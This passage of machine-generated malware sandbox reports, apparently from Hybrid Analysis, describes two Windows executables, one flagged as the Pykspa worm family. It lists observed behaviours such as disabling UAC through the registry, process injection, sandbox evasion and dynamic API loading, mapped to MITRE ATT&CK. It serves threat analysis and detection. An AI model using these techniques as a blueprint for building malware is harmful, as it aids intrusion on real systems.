\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"RtlGetNtProductType\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"GetNativeSystemInfo\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"GetProductInfo\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: KERNEL32.DLL)\n Found string \"GetNativeSystemInfo\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: KERNEL32.DLL)\n Found string \"NtShutdownSystem\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: NTDLL.DLL)\n Found string \"GetProcessWindowStation\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: USER32.DLL)\n Found string \"GetUserObjectInformationA\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: USER32.DLL)\n Found string \"GetLastActivePopup\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: USER32.DLL)\n Found string \"GetActiveWindow\" (Source: 0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927, API is part of module: USER32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" has section name .data with entropy \"6.47782939823\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "registry-10", "type": 3, "relevance": 8, "name": "Modifies the UAC/LUA settings (Account Control)", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"ENABLELUA\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b
https://hybrid-analysis.com/sample/7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b
Hybrid Analysis - Killers
{"size": 9531392, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b", "sha256": "7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b", "av_detect": 87, "vx_family": "Pykspa.Generic", "threat_score": 68, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 114, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "56 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["13 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2067)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "99 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "25 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)", "3 .OBJ Files linked with ALIASOBJ.EXE 7.10 BETA (Internal OLDNAMES.LIB Tool) (build: 2067)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (56 files)"], "total_file_compositions_imports": 225}, "processes": [{"uid": "00000000-00005836", "name": "7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe", "normalized_path": "C:\\7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe", "sha256": "7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\gfiyttnoixhvefhxpxbbadt\"\n \"gfiyttnoixhvefhxpxbbadt\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" file has an entrypoint instructions - \"push\t0x60,push\t0x42b7f0,call\t0x421c1c,mov\tedi, 0x94,mov\teax, edi,call\t0x4216d0,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x42a080],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x463a70], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x463a7c], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x463a80], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x463a74], esi,cmp\tecx, 2,je\t0x4224da,or\tesi, 0x8000,mov\tdword ptr [0x463a74], esi,shl\teax, 8,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"USER32.DLL\" at base 76a60000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"ADVAPI32.DLL\" at base 757c0000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"WS2_32.DLL\" at base 76bb0000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"NETAPI32.DLL\" at base 73340000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"IPHLPAPI.DLL\" at base 73110000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"SHELL32.DLL\" at base 75c10000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"PSAPI.DLL\" at base 750e0000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"SHLWAPI.DLL\" at base 753e0000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"VERSION.DLL\" at base 74240000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e60000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"WININET.DLL\" at base 76bf0000\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"RPCRT4.DLL\" at base 76860000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter netapi32.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SearchPathA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegisterServiceProcess (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CloseWindow (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005836)\n 